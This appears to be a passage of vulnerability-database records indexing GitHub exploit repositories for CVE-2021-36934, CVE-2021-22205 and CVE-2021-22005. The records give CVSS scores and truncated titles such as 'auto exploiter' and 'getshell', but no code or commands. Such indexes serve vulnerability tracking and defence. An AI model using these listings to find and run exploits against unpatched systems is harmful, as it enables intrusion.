{"lastseen": "2022-07-13T19:06:02", "description": "# CVE-2021-36934\nSeriousSAM Auto Exploiter\n\n# Requirements\n- Hiv...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-01T19:54:31", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2022-04-20T08:36:49", "id": "73C3C634-4118-5E8F-A7A7-ADE9356507EC", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-27T08:42:24", "description": "# ShadowSteal | CVE-2021-36934\nPure Nim implementation for explo...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-20T22:16:49", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2022-07-27T07:12:59", "id": "82FD6A90-EA27-5350-98A4-491B6CA140ED", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:54:16", "description": "# CVE-2021-36934\nCVE-2021-36934 HiveNightmare vulnerability chec...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-29T20:35:22", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-30T12:29:18", "id": "E1AF9415-BECF-5F8A-9233-786A0F50E149", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-26T10:03:10", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T12:10:41", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2022-01-22T01:53:54", "id": "943CFE24-FF5E-5BEA-B1DF-3163AED2C847", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-13T23:54:50", "description": "# CVE-2021-36934\n\nC# implementation of [C...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-24T12:55:05", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2022-08-13T21:20:25", "id": "D76E0403-C1B5-59A1-A7E5-B8D3BE2E636D", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:02:52", "description": "# Oxide Hive\nAn exploit for the HiveNightmare/SeriousSAM vulnera...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-12T18:01:21", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2022-05-01T09:47:57", "id": "4FD5C1B6-357A-5C95-AE75-CF79BDD32592", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:55:10", "description": "# CVE-2021-36934\nCVE-2021-36934 PowerShell scripts\n\n* Detection....", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T21:54:45", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-28T01:48:39", "id": "27CF7C36-9804-5585-80B1-749949BF7AD5", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:14:29", "description": "# CVE-2021-22205-getshell\nCVE-2021-22205-getshell\n\n## \u6d4b\u8bd5\u7248\u672c\n\n\n## ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-01T06:06:04", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Gitlab", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22205"], "modified": "2021-11-03T15:30:34", "id": "79FC7D55-7101-56EA-94E4-ABC94E423B3E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-06T17:09:50", "description": "# CVE-2021-22205\nPocsuite3 For CV...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-10-28T06:29:37", "type": "githubexploit", "title": "Exploit for Code Injection in Gitlab", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22205"], "modified": "2023-11-24T19:17:45", "id": "B3557E68-AFF3-54C9-91A8-AFA2ABAA749C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-06T17:09:02", "description": "# CVE-2021-22205\n\n> \u57fa\u4e8e [mr-r3bot/Gitlab-CVE-2021-22205](https://...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-10-30T02:56:34", "type": "githubexploit", "title": "Exploit for Code Injection in Gitlab", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22205"], "modified": "2023-09-28T11:32:47", "id": "82ABA9A8-11DC-5940-A195-1CF159D70E81", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-28T20:31:25", "description": "# CVE-2021-22005-metasploit\nthe metasploit script(POC/EXP) about...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-02T07:32:04", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2022-06-28T16:06:55", "id": "D7E6498B-522A-5F6E-ADCF-45E60A0788D9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-06T17:09:39", "description": "# CVE-2021-22005\n# VMware vCenter Server\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\n\n## Code By:Jun...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-27T08:36:21", "type": "githubexploit", "title": "Exploit for Path Traversal in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2023-02-27T01:06:12", "id": "AEAB39A1-AAEB-53A6-836E-E4994CBDABF7", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-29T00:01:36", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-11-01T05:42:17", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Gitlab", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22205"], "modified": "2021-11-01T05:47:29", "id": "CE2BB841-C742-5463-B5AB-BC69FA352CA1", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-09T15:34:29", "description": "# Whitehat School `vulhub` \ud55c\uae00\ud310\n\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-10-29T13:13:41", "type": "githubexploit", "title": "Exploit for Code Injection in Gitlab", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22205"], "modified": "2023-10-30T02:32:24", "id": "0DD62799-0744-5C6C-9B24-A441A637C095", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-27T15:25:22", "description": "# cve-hash-generator\n\nFinds an identifiable hash value for each ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-18T20:40:55", "type": "githubexploit", "title": "Exploit for Code Injection in Gitlab", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22205"], "modified": "2022-09-20T15:23:45", "id": "7D871BCD-8617-53E6-806A-ABD814B2E32F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-06T17:06:31", "description": "# GitLab-CVE-2021-22205-scanner\n\n## Usage\n\n $~ python3 GitLab...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-11-09T18:19:43", "type": "githubexploit", "title": "Exploit for Code Injection in Gitlab", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22205"], "modified": "2023-04-22T21:31:42", "id": "283DB4E7-F12E-5601-8E71-19E597504268", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-06T17:38:55", "description": "# gitlab-cve-2021-22205\nA simple bash script that exploits CVE-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-11-01T15:19:01", "type": "githubexploit", "title": "Exploit for Code Injection in Gitlab", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22205"], "modified": "2023-11-06T00:16:03", "id": "3A189A7D-D603-5FC3-8F3F-0AE71F99FA2B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-06T14:36:06", "description": "# CVE-2021-22205\n\u7531\u4e8eGitlab\u672a\u6b63\u786e\u9a8c\u8bc1\u4f20\u9012\u5230\u6587\u4ef6\u89e3\u6790\u5668\u7684\u56fe\u50cf\u6587\u4ef6\u4ece\u800c\u5bfc\u81f4\u547d\u4ee4\u6267\u884c\u3002\u653b\u51fb\u8005\u53ef\u6784\u9020\u6076\u610f\u8bf7\u6c42\u5229\u7528...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-07-20T16:57:57", "type": "githubexploit", "title": "Exploit for Code Injection in Gitlab", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22205"], "modified": "2023-09-28T11:40:56", "id": "9CD2575C-CFA0-50A4-8AEC-4BE620162F81", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-06T17:08:49", "description": "# CVE-2021-22205\nCVE-2021-22205 RCE \u5de5\u5177\u4ec5\u7528\u4e8e\u5206\u4eab\u4ea4\u6d41\uff0c\u5207\u52ff\u7528\u4e8e\u975e\u6388\u6743\u6d4b\u8bd5\uff0c\u5426\u5219\u4e0e\u4f5c\u8005\u65e0\u5173\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-10-31T14:34:51", "type": "githubexploit", "title": "Exploit for Code Injection in Gitlab", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22205"], "modified": "2023-09-28T11:32:49", "id": "8F450D89-6392-5E24-8649-ACA9D4C0D054", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-06T17:09:16", "description": "* CVE-2021-22205\n--------\n** Description\n - POC for CVE-2021-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", 